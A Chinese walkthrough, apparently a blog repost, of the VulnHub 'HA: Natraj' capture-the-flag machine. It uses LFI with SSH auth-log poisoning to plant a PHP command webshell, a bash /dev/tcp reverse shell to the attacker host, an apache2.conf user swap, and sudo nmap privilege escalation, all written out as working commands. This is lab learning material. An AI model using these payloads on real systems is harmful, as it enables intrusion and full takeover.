码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • vulnhub HA: Natraj


    渗透思路:

    nmap扫描----dirb扫描网站目录----ffuf爆破url参数----利用auth.log和LFI获得反弹shell----修改/etc/apache2/apache2.conf获得mahakal的shell----sudo nmap提权

    环境信息:

    靶机:192.168.101.78

    攻击机:192.168.101.34

    具体步骤:

    1、nmap扫描

    sudo nmap -sV -sC -p- 192.168.101.78

    2、dirb扫描网站目录

    ​dirb http://192.168.101.78

    扫描到目录http://192.168.101.78/console/

    浏览器访问该目录,发现文件file.php

    直觉告诉我这里可能有文件包含漏洞

    3、ffuf爆破url参数

    ​ffuf -u 'http://192.168.101.78/console/file.php?FUZZ=../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0

    其中FUZZ为需要暴力破解的参数名的占位字符串

    爆破出参数名file

    浏览器访问http://192.168.101.78/console/file.php?file=../../../../etc/passwd

    可以看到靶机的/etc/passwd文件内容

    4、利用用户认证日志和LFI获得反弹shell

    浏览器访问http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log,发现有访问权限

    尝试用natraj进行ssh登录,并输入错误的密码(正确密码反正也不知道)

    ssh natraj@192.168.101.78

    然后再用浏览器访问http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log,发现/var/log/auth.log中记录了ssh登录的用户名

    所以可以在ssh登录的时候将php代码作为用户名插入,这样php代码就会被写入/var/log/auth.log,而利用网站本地文件包含漏洞包含/var/log/auth.log时就会触发写入的php代码执行。

    ssh登录靶机,用户名为"<?php system(\$_GET[xiannv]); ?>",密码随便输

    ssh "<?php system(\$_GET[xiannv]); ?>"@192.168.101.78

    浏览器访问http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log&xiannv=id

    可以得到id命令的执行结果,表明插入的php代码有效

    接下来在攻击机上监听8888端口

    nc -nlvp 8888

    然后在浏览器中访问

    http://192.168.101.78/console/file.php?file=../../../../var/log/auth.log&xiannv=bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F192.168.101.34%2F8888%20%3C%261%27

    其中xiannv的参数值url编码前为bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1'

    得到反弹shell

    5、修改/etc/apache2/apache2.conf获得mahakal的shell

    从攻击机中下载linpeas.sh

    首先攻击机linpeas.sh所在目录下起http服务,比如

    python2 -m SimpleHTTPServer 80

    然后靶机shell下执行以下命令,下载并执行linpeas.sh,检查可能的提权项

    1. www-data@ubuntu:/tmp$ wget http://192.168.101.34/linpeas.sh
    2. www-data@ubuntu:/tmp$ chmod +x linpeas.sh
    3. www-data@ubuntu:/tmp$ ./linpeas.sh

    linpeas.sh发现文件权限777的文件/etc/apache2/apache2.conf,该文件是apache2的主配置文件

    该文件中的User参数设置实际提供服务的子进程的用户,Group参数设置提供服务的子进程运行时的用户组。

    这两个参数原本的值如下,修改这两个参数的值可以在执行步骤4时获得的反弹shell变成其他用户和组。

    User ${APACHE_RUN_USER}

    Group ${APACHE_RUN_GROUP}

    这边我试了natraj、root、mahakal,只有mahakal可以。

    改成natraj虽然可以得到natraj的反弹shell,但natraj没有可以sudo的命令(或者是sudo -l需要密码,忘记是这两个原因中的哪个了-_-|||);

    改成root的时候,主页面(http://192.168.101.78)能打开,但是http://192.168.101.78/console/file.php打不开,目前还不知道是什么原因,我自己猜测可能是有什么安全方面的限制。

    由于靶机上执行不了vim,所以我把/etc/apache2/apache2.conf复制到攻击机上修改User 和Group 为mahakal,并保存

    User mahakal

    Group mahakal

    靶机上进入/tmp目录,从攻击机下载修改后的apache2.conf,并复制到/etc/apache2/apache2.conf

    1. www-data@ubuntu:/tmp$ wget http://192.168.101.34/apache2.conf
    2. www-data@ubuntu:/tmp$ cp /tmp/apache2.conf /etc/apache2/apache2.conf

    然后我本来想重启apache2的,但是www-data用户似乎没有这方面的权限,退而求其次重启系统,但www-data用户也没有这方面的权限,只能在vmware上重启虚拟机了

    重启后重复一遍步骤4中获得反弹shell的操作,得到mahakal的反弹shell。

    执行sudo -l,发现mahakal可以sudo执行nmap命令

    6、sudo nmap提权

    在GTFOBins上查到nmap可以sudo提权

    nmap | GTFOBins

    根据网站的指示依次输入如下命令

    1. mahakal@ubuntu:/var/www/html/console$ TF=$(mktemp)
    2. mahakal@ubuntu:/var/www/html/console$ echo 'os.execute("/bin/bash")' > $TF
    3. mahakal@ubuntu:/var/www/html/console$ sudo nmap --script=$TF

    获得root用户的shell

    找到proof:/root/root.txt

  • 相关阅读:
    软件著作申请注意事项
    查看双翌视觉软件版本号
    gitee使用教程
    深度解密 OpenMLDB 毫秒级实时在线特征计算引擎
    【调试笔记-20240618-Windows-pnpm 更新出现 Cannot find module 问题的解决方法】
    老卫带你学---leetcode刷题(128. 最长连续序列)
    pyecharts 绘制轮播效果图例子
    分享|破世界纪录的OceanBase,如今入选了国际顶会VLDB 2022
    asterisk 使用php脚本连接oralce数据库 通过AMI端口实现预拨号(批量外呼)
    【JUC系列-15】深入理解CompletableFuture的基本使用
  • 原文地址:https://blog.csdn.net/elephantxiang/article/details/125549106
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号